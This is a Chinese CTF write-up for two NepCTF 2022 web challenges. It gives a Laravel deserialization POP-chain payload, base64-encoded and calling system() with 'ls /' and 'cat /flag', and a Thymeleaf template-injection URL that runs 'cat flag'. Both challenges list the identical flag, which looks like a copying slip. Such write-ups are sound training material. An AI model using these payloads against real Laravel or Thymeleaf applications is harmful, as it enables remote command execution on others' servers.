因为有其它的事情,只上线了一会,解了两个签到题就跑路了。
Web
Just Kidding
参考:https://xz.aliyun.com/t/11362 第一条链子。
对照几处关键点都相符:
\vendor\laravel\framework\src\Illuminate\Broadcasting\PendingBroadcast.php
![This is an image](/2022/07/20/NepCTF-2022-WP/image1.png)
\vendor\laravel\framework\src\Illuminate\Bus\Dispatcher.php
![This is an image](/2022/07/20/NepCTF-2022-WP/image2.png)
![This is an image](/2022/07/20/NepCTF-2022-WP/image3.png)
可直接利用,poc如下:
1 | <?php |
1 | Tzo0MDoiSWxsdW1pbmF0ZVxCcm9hZGNhc3RpbmdcUGVuZGluZ0Jyb2FkY2FzdCI6Mjp7czo5OiIAKgBldmVudHMiO086MjU6IklsbHVtaW5hdGVcQnVzXERpc3BhdGNoZXIiOjU6e3M6MTI6IgAqAGNvbnRhaW5lciI7TjtzOjExOiIAKgBwaXBlbGluZSI7TjtzOjg6IgAqAHBpcGVzIjthOjA6e31zOjExOiIAKgBoYW5kbGVycyI7YTowOnt9czoxNjoiACoAcXVldWVSZXNvbHZlciI7czo2OiJzeXN0ZW0iO31zOjg6IgAqAGV2ZW50IjtPOjM4OiJJbGx1bWluYXRlXEJyb2FkY2FzdGluZ1xCcm9hZGNhc3RFdmVudCI6MTp7czoxMDoiY29ubmVjdGlvbiI7czo0OiJscyAvIjt9fQ== |
![This is an image](/2022/07/20/NepCTF-2022-WP/image4.jpg)
1 | Tzo0MDoiSWxsdW1pbmF0ZVxCcm9hZGNhc3RpbmdcUGVuZGluZ0Jyb2FkY2FzdCI6Mjp7czo5OiIAKgBldmVudHMiO086MjU6IklsbHVtaW5hdGVcQnVzXERpc3BhdGNoZXIiOjU6e3M6MTI6IgAqAGNvbnRhaW5lciI7TjtzOjExOiIAKgBwaXBlbGluZSI7TjtzOjg6IgAqAHBpcGVzIjthOjA6e31zOjExOiIAKgBoYW5kbGVycyI7YTowOnt9czoxNjoiACoAcXVldWVSZXNvbHZlciI7czo2OiJzeXN0ZW0iO31zOjg6IgAqAGV2ZW50IjtPOjM4OiJJbGx1bWluYXRlXEJyb2FkY2FzdGluZ1xCcm9hZGNhc3RFdmVudCI6MTp7czoxMDoiY29ubmVjdGlvbiI7czo5OiJjYXQgL2ZsYWciO319 |
![This is an image](/2022/07/20/NepCTF-2022-WP/image5.jpg)
flag: NepCTF{c2edd745-b451-4b64-a37e-bdd1942d5a7c}
Challenger
java Thymeleaf 模板注入,直接打就行
![This is an image](/2022/07/20/NepCTF-2022-WP/image6.png)
payload如下:
1 | /eval?lang=__$%7bnew%20java.util.Scanner(T(java.lang.Runtime).getRuntime().exec(%22cat%20flag%22).getInputStream()).next()%7d__::.x |
![This is an image](/2022/07/20/NepCTF-2022-WP/image7.png)
flag: NepCTF{c2edd745-b451-4b64-a37e-bdd1942d5a7c}
一些相关的学习链接
Java安全之Thymeleaf 模板注入分析 https://www.cnblogs.com/nice0e3/p/16212784.html
转载请注明来源,欢迎对文章中的引用来源进行考证,欢迎指出任何有错误或不够清晰的表达。可以在下面评论区评论,也可以邮件至 hututu1024@126.com